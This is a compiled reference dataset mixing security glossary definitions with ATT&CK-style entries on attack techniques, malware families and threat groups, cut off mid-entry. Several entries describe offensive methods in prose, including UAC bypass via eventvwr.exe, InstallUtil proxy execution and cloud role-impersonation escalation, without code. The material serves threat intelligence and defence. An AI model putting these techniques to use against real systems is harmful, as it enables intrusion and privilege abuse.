Description: Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (<code>services.exe</code>) is an interface to manage and manipulate services. The service control manager is accessible to users via GUI components as well as system utilities such as <code>sc.exe</code> and Net.

PsExec can also be used to execute commands or payloads via a temporary Windows service created through the service control manager API. Tools such as PsExec and <code>sc.exe</code> can accept remote servers as arguments and may be used to conduct remote execution.

Adversaries may leverage these mechanisms to execute malicious content. This can be done by either executing a new or modified service. This technique is the execution used in conjunction with Windows Service during service persistence or privilege escalation.

Term: resource control
Definition: A capability in which an attacker controls one or more external resources consumed by a machine learning model at inference time, particularly for GenAI systems such as retrieval-augmented generation applications.

Term: SHA-1
Definition: A hash algorithm with the property that it is computationally infeasible 1) to find a message that corresponds to a given message digest, or 2) to find two different messages that produce the same message digest.

Term: architecture
Definition: A set of physical and logical security-relevant representations (i.e., views) of system architecture that conveys information about how the system is partitioned into security domains and makes use of security-relevant elements to enforce security policies within and between security domains based on how data and information must be protected. 
Note: The security architecture reflects security domains, the placement of security-relevant elements within the security domains, the interconnections and trust relationships between the security-relevant elements, and the behavior and interactions between the security-relevant elements. The security architecture, similar to the system architecture, may be expressed at different levels of abstraction and with different scopes.

Term: BGP security extension
Definition: Security extension to the BGP protocol. It allows to digitally sign path information that can be independently verified and therefore eliminate the possibility to alter path information without notice.

Name: UNC3886
Type: intrusion-set
Description: UNC3886 is a China-nexus cyberespionage group that has been active since at least 2022, targeting defense, technology, and telecommunication organizations located in the United States and the Asia-Pacific-Japan (APJ) regions. UNC3886 has displayed a deep understanding of edge devices and virtualization technologies through the exploitation of zero-day vulnerabilities and the use of novel malware families and utilities.

Term: securely resilient
Definition: The ability of a system to preserve a secure state despite disruption, to include the system transitions between normal and degraded modes. Securely resilient is a primary objective of systems security engineering.

Term: data action
Definition: System operations that process PII.

Term: coalition partner
Definition: A nation in an ad hoc defense arrangement with the United States.

Term: information security risk
Definition: The risk to organizational operations (including mission, functions, image, reputation), organizational assets, individuals, other organizations, and the Nation due to the potential for unauthorized access, use, disclosure, disruption, modification, or destruction of information and/or a system.

Term: ID
Definition: Information that is unique within a security domain and which is recognized as denoting a particular entity within that domain.

Name: OwaAuth
Type: malware
Description: OwaAuth is a Web shell and credential stealer deployed to Microsoft Exchange servers that appears to be exclusively used by Threat Group-3390.

Term: destroy
Definition: An action applied to a key or other piece of secret data. After a key or piece of secret data is destroyed, no information about its value can be recovered.

Term: provisioning
Definition: The process of the network onboarding component providing onboarding credentials to an IoT device [in the context of network-layer onboarding].

Term: Initialization Vector (IV)
Definition: A data block that some modes of operation require as an additional initial input.

Term: Key type
Definition: One of the twenty-one types of keys listed in [NIST SP 800-130].

Term: system security plan
Definition: See information system security plan.

Term: Test Tools
Definition: are a means of testing to confirm that an IT product, process, or service conforms to the requirements of a standard or standards. Examples of test tools are executable test code or reference data.

Term: Iris segmentation
Definition: Segmentation is the automated (and possibly manually reviewed) detection of the iris-sclera and iris-pupil boundaries. This localizes the iris texture that is used for actual recognition.

Term: information security program plan
Definition: Formal document that provides an overview of the security requirements for an organization-wide information security program and describes the program management controls and common controls in place or planned for meeting those requirements.

Name: Peirates
Type: tool
Description: Peirates is a post-exploitation Kubernetes exploitation framework with a focus on gathering service account tokens for lateral movement and privilege escalation. The tool is written in GoLang and publicly available on GitHub.

Term: Multi-Factor
Definition: A characteristic of an authentication system or an authenticator that requires more than one distinct authentication factor for successful authentication. MFA can be performed using a single authenticator that provides more than one factor or by a combination of authenticators that provide different factors. 
The three authentication factors are something you know, something you have, and something you are.

Term: atomic operation
Definition: An atomic operation is effectively executed as a single step, no other process can read or modify the internal state while the atomic operation is executed.

Term: memorized secret
Definition: Confidential authentication information, usually composed of a string of characters.

Term: ICS
Definition: General term that encompasses several types of control systems, including supervisory control and data acquisition (SCADA) systems, distributed control systems (DCS), and other control system configurations that are often found in the industrial sectors and critical infrastructures, such as programmable logic controllers (PLC). An ICS consists of combinations of control components (e.g., electrical, mechanical, hydraulic, pneumatic) that act together to achieve an industrial objective (e.g., manufacturing, transportation of matter or energy).

Term: BOF
Definition: A condition at an interface under which more input can be placed into a buffer or data holding area than the capacity allocated, overwriting other information. Adversaries exploit such a condition to crash a system or to insert specially crafted code that allows them to gain control of the system.

Term: electronic/digital file transfer
Definition: Transmission of a file (information) between two systems via a file transfer (communications) protocol.

Term: trustworthiness
Definition: Worthy of being trusted to fulfill whatever critical requirements may be needed for a particular component, subsystem, system, network, application, mission, enterprise, or other entity.
Note: From a security perspective, a trustworthy system is a system that meets specific security requirements in addition to meeting other critical requirements.

Name: 4H RAT
Type: malware
Description: 4H RAT is malware that has been used by Putter Panda since at least 2007.

Term: recovery and reconstitution
Definition: Actions taken during or after an incident or event to restore functions and capability to fully operational states.

Term: IT System
Definition: a collection of computing and/or communications components and otherresources that support one or more functional objectives of an organization. IT system resources include any IT component plus associated manual procedures and physical facilities that are used in the acquisition, storage, manipulation, display, and/or movement of data or to direct or monitor operating procedures. An IT system may consist of one or more computers and their related resources of any size. The resources that comprise a system do not have to be physically connected.

Term: federation
Definition: A process that allows for the conveyance of identity and authentication information across a set of networked systems. This is done in an interoperable way using federation protocols such as OpenID Connect or SAML.

Name: MCMD
Type: tool
Description: MCMD is a remote access tool that provides remote command shell capability used by Dragonfly.

Term: Capability, Security
Definition: See Capability, Security.

Term: incident handling
Definition: The remediation or mitigation of violations of security policies and recommended practices.

Term: Invalidate
Definition: To render a credential or authenticator incapable of being used for authentication by causing its authenticator output to no longer be accepted by relying parties.

Term: Sentences, formal
Definition: The entire set of sentences that can be created or recognized as being valid using the formal syntax specifications of a formal language.

Term: RPKI Validation Cache
Definition: RPKI Validation Cache provides Validated ROA Payload (VRP) and public router keys.

Term: Secure Multipurpose Internet Mail Extensions (S/MIME)
Definition: A protocol defined in IETF RFCs 3850 through 3852 and 2634 for encrypting messages and creating certificates using public key cryptography. S/MIME is supported by default installations of many popular mail clients. S/MIME uses a classic, hierarchical design based on certificate authorities for its key management, making it suitable for medium to large implementations.

Term: Authorized
Definition: A system entity or actor that has been granted the right, permission, or capability to access a system resource. See also “Authorization”.

Term: Public cloud
Definition: The cloud infrastructure is provisioned for open use by the general public. It may be owned, managed, and operated by a business, academic, or government organization, or some combination of them. It exists on the premises of the cloud provider.

Name: Bypass User Account Control
Type: attack-pattern
Description: Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.

If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated Component Object Model objects without prompting the user through the UAC notification box. An example of this is use of Rundll32 to load a specifically crafted DLL which loads an auto-elevated Component Object Model object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.

Many methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods that have been discovered and implemented, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:

* <code>eventvwr.exe</code> can auto-elevate and execute a specified binary or script.

Another bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.

Term: Incomplete Gamma Function
Definition: See the definition for igamc.

Term: Extension
Definition: The set of individual products to which a WFN refers.

Name: KONNI
Type: malware
Description: KONNI is a remote access tool that security researchers assess has been used by North Korean cyber actors since at least 2014. KONNI has significant code overlap with the NOKKI malware family, and has been linked to several suspected North Korean campaigns targeting political organizations in Russia, East Asia, Europe and the Middle East; there is some evidence potentially linking KONNI to APT37.

Term: Attribute Value
Definition: A complete statement asserting a property of an entity, independent of format. For example, for the attribute "birthday," a value could be "12/1/1980" or "December 1, 1980."

Name: InstallUtil
Type: attack-pattern
Description: Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. The InstallUtil binary may also be digitally signed by Microsoft and located in the .NET directories on a Windows system: <code>C:\Windows\Microsoft.NET\Framework\v<version>\InstallUtil.exe</code> and <code>C:\Windows\Microsoft.NET\Framework64\v<version>\InstallUtil.exe</code>.

InstallUtil may also be used to bypass application control through use of attributes within the binary that execute the class decorated with the attribute <code>[System.ComponentModel.RunInstaller(true)]</code>.

Term: Periodic Template Test
Definition: The purpose of this test is to reject sequences that show deviations from the expected number of runs of ones of a given length.

Term: firewall
Definition: A system designed to prevent unauthorized accesses to or from a private network. Often used to prevent Internet users from accessing private networks connected to the Internet.

Term: process assistant
Definition: An individual who provides support for the proofing process but does not support decision-making or risk-based evaluation (e.g., translation, transcription, or accessibility support).

Term: security functionality
Definition: The security-related features, functions, mechanisms, services, procedures, and architectures implemented within organizational systems or the environments in which those systems operate.

Term: token
Definition: A representation of a particular asset that typically relies on a blockchain or other types of distributed ledgers.

Term: operational environment
Definition: The type of environment in which the checklist is intended to be applied. Types of operational environments are Standalone, Managed, and Custom (including Specialized Security-Limited Functionality, Legacy, and United States Government).

Term: Key de-registration
Definition: A stage in the lifecycle of keying material; the removal of all records of keying material that was registered by a registration authority.

Term: <em>Start-up testing</em>
Definition: A suite of health tests that are performed every time the entropy source is initialized or powered up. These tests are carried out on the noise source before any output is released from the entropy source.

Term: Address
Definition: The additional authenticated data

Term: Capabilities Catalog
Definition: Comprehensive list of device cybersecurity capabilities derived from analysis of comprehensive list of source documents for the application or sector. For the federal sector, NIST SP 800-53 Rev. 5, <i>Security and Privacy Controls for Information Systems and Organizations</i>, provided the definition of controls used to generate the NIST generated capabilities catalog used for the federal profile.&nbsp;

Term: Information System User
Definition: A person, organization, or other entity which requests access to and uses the resources of a computer system or network.

Term: Electronic Business XML (ebXML)
Definition: Sponsored by UN/CEFACT and OASIS, a modular suite of specifications that enable enterprises of any size and in any geographical location to perform business-to-business transactions using XML.

Name: ServHelper
Type: malware
Description: ServHelper is a backdoor first observed in late 2018. The backdoor is written in Delphi and is typically delivered as a DLL file.

Term: attacker
Definition: A party, including an insider, who acts with malicious intent to compromise a system.

Name: SocGholish
Type: malware
Description: SocGholish is a JavaScript-based loader malware that has been used since at least 2017. It has been observed in use against multiple sectors globally for initial access, primarily through drive-by-downloads masquerading as software updates. SocGholish is operated by Mustard Tempest and its access has been sold to groups including Indrik Spider for downloading secondary RAT and ransomware payloads.

Term: audit (data)
Definition: Examination of data for quality and accuracy.

Term: ID
Definition: A unique, auditable representation of identity within the system usually in the form of a simple character string for each individual user, machine, software component or any other entity.

Term: Weapons System
Definition: A 'weapons system' is a combination of one or more weapons with all related equipment, materials, services, personnel, and means of delivery and deployment (if applicable) required for self- sufficiency.

Term: Memorandum of Understanding or Agreement
Definition: Used to document agreements and execute or deliver support with or without reimbursement between any two or more parties. When a support agreement involves reimbursement, an MOA can be used to further detail terms and conditions in addition to the FS Form 7600A.

Name: Gootloader
Type: malware
Description: Gootloader is a Javascript-based infection framework that has been used since at least 2020 as a delivery method for the Gootkit banking trojan, Cobalt Strike, REvil, and others. Gootloader operates on an "Initial Access as a Service" model and has leveraged SEO Poisoning to provide access to entities in multiple sectors worldwide including financial, military, automotive, pharmaceutical, and energy.

Term: File Integrity Checking
Definition: Software that generates, stores, and compares message digests for files to detect changes made to the files.

Term: Information System User
Definition: A person, team, or organization that accesses or otherwise uses an Online Informative Reference.

Term: authenticate
Definition: To confirm the identity of an entity when that identity is presented.

Term: malware
Definition: A computer program that is covertly placed onto a computer with the intent to compromise the privacy, accuracy, or reliability of the computer’s data, applications, or operating system.

Term: Checklist Revision
Definition: Represents a change to the checklist content that does not affect the underlying rule/value configuration guidance put forth by the content. A scenario that would require a new checklist revision would be when SCAP content is created for a prose checklist. This revision would change the checklist's Tier status from Tier I to either Tier III or IV. A new checklist revision would be created to accommodate this change, while still maintaining the Tier I checklist revision for interested parties.

Term: capability
Definition: A feature or function.

Term: AD
Definition: A Microsoft directory service for the management of identities in Windows domain networks.

Term: public key certificate
Definition: A digital representation of information which at least (1) identifies the certification authority (CA) issuing it, (2) names or identifies its subscriber, (3) contains the subscriber's public key, (4) identifies its operational period, and (5) is digitally signed by the certification authority issuing it.

Term: block cipher
Definition: An algorithm for a parameterized family of permutations on bit strings of a fixed length.

Term: bidirectional authentication
Definition: Two parties authenticating each other at the same time. Also known as mutual authentication or two-way authentication.

Name: Exfiltration Over Web Service
Type: attack-pattern
Description: Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. Popular Web services acting as an exfiltration mechanism may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to compromise. Firewall rules may also already exist to permit traffic to these services.

Web service providers also commonly use SSL/TLS encryption, giving adversaries an added level of protection.

Term: Forward Cipher Function
Definition: The permutation of blocks that is determined by the choice of a block cipher and a key.

Term: Derived PIV Credential
Definition: A credential&nbsp;issued based on proof of possession and control of a PIV Card. Derived&nbsp;PIV credentials are typically used in situations that do not easily accommodate a PIV&nbsp;Card, such&nbsp;as&nbsp;in&nbsp;conjunction&nbsp;with&nbsp;mobile&nbsp;devices.

Term: DES
Definition: The symmetric encryption algorithm defined by the Data Encryption Standard (FIPS 46-2).

Term: Computer Security Incident
Definition: An occurrence that actually or imminently jeopardizes, without lawful authority, the confidentiality, integrity, or availability of information or an information system; or constitutes a violation or imminent threat of violation of law, security policies, security procedures, or acceptable use policies.

Term: computer forensics
Definition: See digital forensics.

Term: IT
Definition: Any equipment or interconnected system or subsystem of equipment that is used in the automatic acquisition, storage, manipulation, management, movement, control, display, switching, interchange, transmission, or reception of data or information by the executive agency.

Term: <em>r</em>
Definition: An integer that is less than or equal to 32, whose value is the bit length of the agreed-upon binary encoding of a counter <i>i</i> used as input during invocations of the PRF employed by a KDF.

Term: Tamper resistant
Definition: A process which makes alterations to the data difficult (hard to perform), costly (expensive to perform), or both.

Name: Temporary Elevated Cloud Access
Type: attack-pattern
Description: Adversaries may abuse permission configurations that allow them to gain temporarily elevated access to cloud resources. Many cloud environments allow administrators to grant user or service accounts permission to request just-in-time access to roles, impersonate other accounts, pass roles onto resources and services, or otherwise gain short-term access to a set of privileges that may be distinct from their own. 

Just-in-time access is a mechanism for granting additional roles to cloud accounts in a granular, temporary manner. This allows accounts to operate with only the permissions they need on a daily basis, and to request additional permissions as necessary. Sometimes just-in-time access requests are configured to require manual approval, while other times the desired permissions are automatically granted.

Account impersonation allows user or service accounts to temporarily act with the permissions of another account. For example, in GCP users with the `iam.serviceAccountTokenCreator` role can create temporary access tokens or sign arbitrary payloads with the permissions of a service account, while service accounts with domain-wide delegation permission are permitted to impersonate Google Workspace accounts. In Exchange Online, the `ApplicationImpersonation` role allows a service account to use the permissions associated with specified user accounts. 

Many cloud environments also include mechanisms for users to pass roles to resources that allow them to perform tasks and authenticate to other services. While the user that creates the resource does not directly assume the role they pass to it, they may still be able to take advantage of the role's access -- for example, by configuring the resource to perform certain actions with the permissions it has been granted. In AWS, users with the `PassRole` permission can allow a service they create to assume a given role, while in GCP, users with the `iam.serviceAccountUser` role can attach a service account to a resource.

While users require specific role assignments in order to use any of these features, cloud administrators may misconfigure permissions. This could result in escalation paths that allow adversaries to gain access to resources beyond what was originally intended.

**Note:** this technique is distinct from Additional Cloud Roles, which involves assigning permanent roles to accounts rather than abusing existing permissions structures to gain temporarily elevated access to resources. However, adversaries that compromise a sufficiently privileged account may grant another account they control Additional Cloud Roles that would allow them to also abuse these features. This may also allow for greater stealth than would be had by directly using the highly privileged account, especially when logs do not clarify when role impersonation is taking place.

Term: ID
Definition: The bit string denoting the identifier associated with an entity.

Term: system-related privacy risk
Definition: Those risks that arise from the likelihood that a given operation the system is taking when processing PII could create an adverse effect on individuals—and the potential impact on individuals.

Name: ZeroCleare
Type: malware
Description: ZeroCleare is a wiper malware that has been used in conjunction with the RawDisk driver since at least 2019 by suspected Iran-nexus threat actors including activity targeting the energy and industrial sectors in the Middle East and political targets in Albania.

Term: KDK
Definition: A function by which keying material is derived from a shared secret (or a key) and other information.

Term: Authentication Factor
Definition: The three types of authentication factors are something you know, something you have, and something you are. Every authenticator has one or more authentication factors.

Term: non-repudiation
Definition: A service using a digital signature that is used to support a determination by a third party of whether a message was actually signed by a given entity.

Term: Privacy Control Assessor
Definition: The individual responsible for conducting assessment activities under the guidance and direction of a Designated Authorizing Official. The Assessor is a 3rd party.

Term: module
Definition: The set of hardware, software, and/or firmware that implements approved security functions and is contained within a cryptographic boundary.

Name: LAMEHUG
Type: malware
Description: LAMEHUG is Python-based information stealer first identified in July 2025 by Ukraine's Computer Emergency Response Team (CERT-UA) in phishing emails targeting Ukrainian government officials. LAMEHUG is the first known malware to integrate artificial intelligence (AI) directly into its attack workflow by querying large language models (LLMs) hosted on Hugging Face to dynamically generate reconnaissance, data theft, and system manipulation commands in real time. LAMEHUG has been attributed to APT28.

Term: Conformity Assessment
Definition: activity that provides demonstration that specified requirements relating to a product, process, system, person or body are fulfilled.

Name: VERMIN
Type: malware
Description: VERMIN is a remote access tool written in the Microsoft .NET framework. It is mostly composed of original code, but also has some open source code.

Term: risk criteria
Definition: Terms of reference against which the significance of a risk is evaluated, such as organizational objectives, internal/external context, and mandatory requirements (e.g., standards, laws, policies).

Term: Unbiased
Definition: A value that is chosen from a sample space is said to be unbiased if all potential values have the same probability of being chosen. (Contrast with biased.)

Term: Cyber Threat
Definition: Any circumstance or event with the potential to adversely impact agency operations (including mission, functions, image, or reputation), agency assets, or individuals through an information system via unauthorized access, destruction, disclosure, modification of information, and/or denial of service.

Term: Cryptographic algorithm
Definition: A well-defined computational procedure that takes variable inputs (often including a cryptographic key) and produces an output.

Term: trust anchor
Definition: The key for a certificate authority who issues certificates or authorizes others to do so on its behalf

Term: assurance
Definition: The grounds for confidence that the set of intended security controls in an information system are effective in their application.

Name: Tool
Type: attack-pattern
Description: Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: PsExec). 

Adversaries may obtain tools to support their operations, including to support execution of post-compromise behaviors. Tools may also be leveraged for testing – for example, evaluating malware against commercial antivirus or endpoint detection and response (EDR) applications.

Tool acquisition may involve the procurement of commercial software licenses, including for red teaming tools such as Cobalt Strike. In addition to freely downloading or purchasing software, adversaries may steal software and/or software licenses from third-party entities (including other adversaries). Threat actors may also crack trial versions of software.

Term: Identity authentication
Definition: The process of providing assurance about the identity of an entity interacting with a system; also see Source authentication.

Term: environment conditions
Definition: Dynamic factors, independent of subject and object, that may be used as attributes at decision time to influence an access decision.

Term: module
Definition: Discrete and identifiable element with a well-defined interface and well-defined purpose or role whose effect is described as relations among inputs, outputs, and retained state.

Term: Profile features
Definition: The properties or characteristics that could be used by FCKMSs, but are not required or recommended by this Profile.

Term: Conflict
Definition: One or more participants disagree on the state of the system.

Name: TAMECAT
Type: malware
Description: TAMECAT is a malware that is used by APT42 to execute PowerShell or C# content.

Term: Primitive algorithm
Definition: A low-level cryptographic algorithm (e.g., an RSA encryption operation) used as a basic building block for higher-level cryptographic algorithms or schemes (e.g., RSA key transport).

Term: Key wrapping
Definition: A method of encrypting and decrypting keys and (possibly) associated data using a symmetric key; both confidentiality and integrity protection are provided.

Term: memorized secret
Definition: A secret shared between the user and the party issuing credentials. Memorized Secret Tokens are typically character strings (e.g., passwords and passphrases) or numerical strings (e.g., PINs).

Term: RFC
Definition: A Request For Comments is a formal standards-track document developed in working groups within the Internet Engineering Task Force (IETF).

Term: DVD
Definition: Has the same shape and size as a CD, but with a higher density that gives the option for data to be double-sided and/or double-layered.

Term: Exercise Director
Definition: A person responsible for all aspects of an exercise, including staffing, development, conduct, and logistics.

Term: Copy (data)
Definition: To replicate data in another location while maintaining it in its original location.

Term: CA
Definition: An entity authorized to create, sign, issue, and revoke public key certificates.

Term: cyberspace exploitation
Definition: Actions taken in cyberspace to gain intelligence, maneuver, collect information, or perform other enabling actions required to prepare for future military operations.

Term: Federal Information Systems Security Educators’ Association
Definition: theFederal Information Systems Security Educator’s Association, an organization whose members come from federal agencies, industry, and academic institutions devoted to improving the IT security awareness and knowledge within the federal government and its related external workforce.

Term: verifier
Definition: An entity that verifies the claimant’s identity by verifying the claimant’s possession and control of a token using an authentication protocol. To do this, the Verifier may also need to validate credentials that link the token and identity and check their status.

Name: SOUNDBITE
Type: malware
Description: SOUNDBITE is a signature backdoor used by APT32.

Term: organization-defined control parameter
Definition: The variable part of a control or control enhancement that can be instantiated by an organization during the tailoring process by either assigning an organization-defined value or selecting a value from a pre-defined list provided as part of the control or control enhancement.

Term: SAO
Definition: Senior Authorizing Official; A senior organization official that has budgetary control, provides oversight, develops policy, and has authority over all functions and services provided by the issuer.

Term: Scripting Language
Definition: A definition of the syntax and semantics for writing and interpreting scripts.

Term: ICT/OT-related service providers
Definition: Any organization or individual providing services which may include authorized access to an ICT or OT system.

Name: Gazer
Type: malware
Description: Gazer is a backdoor used by Turla since at least 2016.

Term: Advanced Encryption Standard
Definition: Advanced Encryption Standard specified in [FIPS 197].

Term: nonce
Definition: A randomly generated value used to defeat “playback” attacks in communication protocols. One party randomly generates a nonce and sends it to the other party. The receiver encrypts it using the agreed upon secret key and returns it to the sender. Because the sender randomly generated the nonce, this defeats playback attacks because the replayer cannot know in advance the nonce the sender will generate. The receiver denies connections that do not have the correctly encrypted nonce.

Term: supply chain element
Definition: Organizations, departments, facilities, or personnel responsible for a particular systems security engineering activity conducted within an engineering process (e.g., operations elements, logistics elements, maintenance elements, and training elements).

Name: Moneybird
Type: malware
Description: Moneybird is a ransomware variant written in C++ associated with Agrius operations. The name "Moneybird" is contained in the malware's ransom note and as strings in the executable.

Name: AvosLocker
Type: malware
Description: AvosLocker is ransomware written in C++ that has been offered via the Ransomware-as-a-Service (RaaS) model. It was first observed in June 2021 and has been used against financial services, critical manufacturing, government facilities, and other critical infrastructure sectors in the United States. As of March 2022, AvosLocker had also been used against organizations in Belgium, Canada, China, Germany, Saudi Arabia, Spain, Syria, Taiwan, Turkey, the United Arab Emirates, and the United Kingdom.

Term: constraints
Definition: Access Control rules or confinements that describe the access privileges of resources for subjects.

Term: cookie
Definition: A piece of state information supplied by a web server to a browser that is temporarily stored and returned to the server on any subsequent visits or requests.

Term: Archive
Definition: 1. To place information into long-term storage.

Name: Akira
Type: malware
Description: Akira ransomware, written in C++, is most prominently (but not exclusively) associated with the ransomware-as-a-service entity Akira. Akira ransomware has been used in attacks across North America, Europe, and Australia, with a focus on critical infrastructure sectors including manufacturing, education, and IT services. Akira ransomware employs hybrid encryption and threading to increase the speed and efficiency of encryption and runtime arguments for tailored attacks. Notable variants include Rust-based Megazord for targeting Windows and Akira _v2 for targeting VMware ESXi servers.

Term: cyclic redundancy check (CRC)
Definition: A method to ensure data has not been altered after being sent through a communication channel.

Term: Autonomous System (AS)
Definition: One or more routers under a single administration operating the same routing policy.

Name: Cuckoo Stealer
Type: malware
Description: Cuckoo Stealer is a macOS malware with characteristics of spyware and an infostealer that has been in use since at least 2024. Cuckoo Stealer is a universal Mach-O binary that can run on Intel or ARM-based Macs and has been spread through trojanized versions of various potentially unwanted programs or PUP's such as converters, cleaners, and uninstallers.

Term: variable
Definition: A logical entity that holds a single value.

Term: Access Management
Definition: Access Management is the set of practices that enables only those permitted the ability to perform an action on a particular resource. The three most common Access Management services you encounter every day perhaps without realizing it are: Policy Administration, Authentication, and Authorization.

Term: senior agency information security officer (SAISO)
Definition: Official responsible for carrying out the Chief Information Officer responsibilities under FISMA and serving as the Chief Information Officer’s primary liaison to the agency’s authorizing officials, information system owners, and information system security officers.
Note: Organizations subordinate to federal agencies may use the term Senior Information Security Officer or Chief Information Security Officer to denote individuals filling positions with similar responsibilities to Senior Agency Information Security Officers.

Term: approval to operate
Definition: seeCertificationandAccreditation.

Term: hash value/result
Definition: See message digest.

Term: COMSEC element
Definition: Removable item of COMSEC equipment, assembly, or subassembly; normally consisting of a single piece or group of replaceable parts. 
Rationale: The term falls under the broader term “COMSEC material”.

Term: TCBC-I
Definition: TDEA Cipher Block Chaining Mode of Operation - Interleaved

Name: POSHSPY
Type: malware
Description: POSHSPY is a backdoor that has been used by APT29 since at least 2015. It appears to be used as a secondary backdoor used if the actors lost access to their primary backdoors.

Term: Computer Security Incident
Definition: Anomalous or unexpected event, set of events, condition, or situation at any time during the life cycle of a project, product, service, or system.

Name: Spearphishing Attachment
Type: attack-pattern
Description: Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon User Execution to gain execution. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.

There are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one.

Term: assessment object
Definition: The item (specifications, mechanisms, activities, individuals) upon which an assessment method is applied during an assessment.

Term: trustworthiness
Definition: Computer hardware, software and procedures that: (1) are reasonably secure from intrusion and misuse; (2) provide a reasonable level of availability, reliability, and correct operation; (3) are reasonably suited to performing their intended functions; and (4) adhere to generally accepted security procedures.

Term: SA
Definition: Individual or group responsible for overseeing the day-to-day operability of a computer system or network. This position normally carries special privileges including access to the protection state and software of a system.

Term: parent assessment element
Definition: The assessment element in a prior process step from which the current element was derived.

Term: Transport Layer Security (TLS)
Definition: An authentication and encryption protocol widely implemented in browsers and Web servers. HTTP traffic transmitted using TLS is known as HTTPS.

Term: Hash chain
Definition: An append-only data structure where data is bundled into data blocks that include a hash of the previous data block’s data within the newest data block. This data structure provides evidence of tampering because any modification to a data block will change the hash digest recorded by the following data block.

Term: HIPAA
Definition: A federal statute that called on the federal Department of Health and Human Services to establish regulatory standards to protect the privacy and security of individually identifiable health information.

Term: ICB
Definition: The initial counter block

Term: encryption
Definition: The process of changing plaintext into ciphertext.

Term: PIV Credential
Definition: Evidence attesting to one’s right to credit or authority; in [FIPS 201-2]. It is the PIV Card or Derived PIV Credential token and data elements associated with an individual that authoritatively binds an identity (and, optionally, additional attributes) to that individual.

Term: quality characteristic
Definition: Inherent characteristic of a product, process, or system related to a requirement.

Term: information technology product
Definition: A system, component, application, etc., that is based upon technology which is used to electronically process, store, or transmit information.

Term: configuration management
Definition: A collection of activities focused on establishing and maintaining the integrity of information technology products and systems, through control of processes for initializing, changing, and monitoring the configurations of those products and systems throughout the system development life cycle.

Term: exclusive-OR
Definition: Exclusive-Or (XOR) operator, defined as bit-wise modulo 2 arithmetic with no carry.

Term: Write-Blocker
Definition: A device that allows investigators to examine media while preventing data writes from occurring on the subject media.

Term: encryption
Definition: Any procedure used in cryptography to convert plain text into cipher text to prevent anyone but the intended recipient from reading that data.

Term: Source of Randomness
Definition: A component of a DRBG (which consists of a DRBG mechanism and a randomness source) that outputs bitstrings that are used as entropy input by the DRBG mechanism. The randomness source can be an entropy source or an RBG.

Term: correctness proof
Definition: Formal technique used to prove mathematically that a computer program satisfies its specified requirements.

Term: Customization
Definition: The ability to control the appearance of the SSL VPN Web pages that the users see when they first access the VPN.

Term: hash function
Definition: A function that maps a bit string of arbitrary (although bounded) length to a fixed-length bit string. Approved hash functions satisfy the following properties: 
1. (One-way) It is computationally infeasible to find any input that maps to any pre-specified output, and 
2. (Collision resistant) It is computationally infeasible to find any two distinct inputs that map to the same output.

Term: malware
Definition: An application that is covertly inserted into another piece of software (e.g., operating system, application) with the intent to steal or destroy data, run destructive or intrusive programs, or otherwise compromise the confidentiality, integrity, or availability of the victim’s data, applications, or operating system.

Term: resource negotiation
Definition: Built-in data management capabilities that provide the necessary support functions, such as operations management, workflow integration, security, governance, support for additional processing models, and controls for multi-tenant environments, providing higher availability and lower latency applications.

Name: Traffic Duplication
Type: attack-pattern
Description: Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised infrastructure. Traffic mirroring is a native feature for some devices, often used for network analysis. For example, devices may be configured to forward network traffic to one or more destinations for analysis by a network analyzer or other monitoring device. 

Adversaries may abuse traffic mirroring to mirror or redirect network traffic through other infrastructure they control. Malicious modifications to network devices to enable traffic redirection may be possible through ROMMONkit or Patch System Image.

Many cloud-based environments also support traffic mirroring. For example, AWS Traffic Mirroring, GCP Packet Mirroring, and Azure vTap allow users to define specified instances to collect traffic from and specified targets to send collected traffic to.

Adversaries may use traffic duplication in conjunction with Network Sniffing, Input Capture, or Adversary-in-the-Middle depending on the goals and objectives of the adversary.

Name: XTunnel
Type: malware
Description: XTunnel a VPN-like network proxy tool that can relay traffic between a C2 server and a victim. It was first seen in May 2013 and reportedly used by APT28 during the compromise of the Democratic National Committee.

Term: identity verification
Definition: A process whose purpose is to provide objective evidence that a system or system element fulfills its specified requirements and characteristics. Note: Methods of performing verification action generally include inspection, analysis, demonstration, or test.

Term: Lightweight Directory Access Protocol (LDAP)
Definition: The LDAP is a directory access protocol. In this document, LDAP refers to the protocol defined by RFC 1777, which is also known as LDAP V2. LDAP V2 describes unauthenticated retrieval mechanisms.

Term: WiMAX
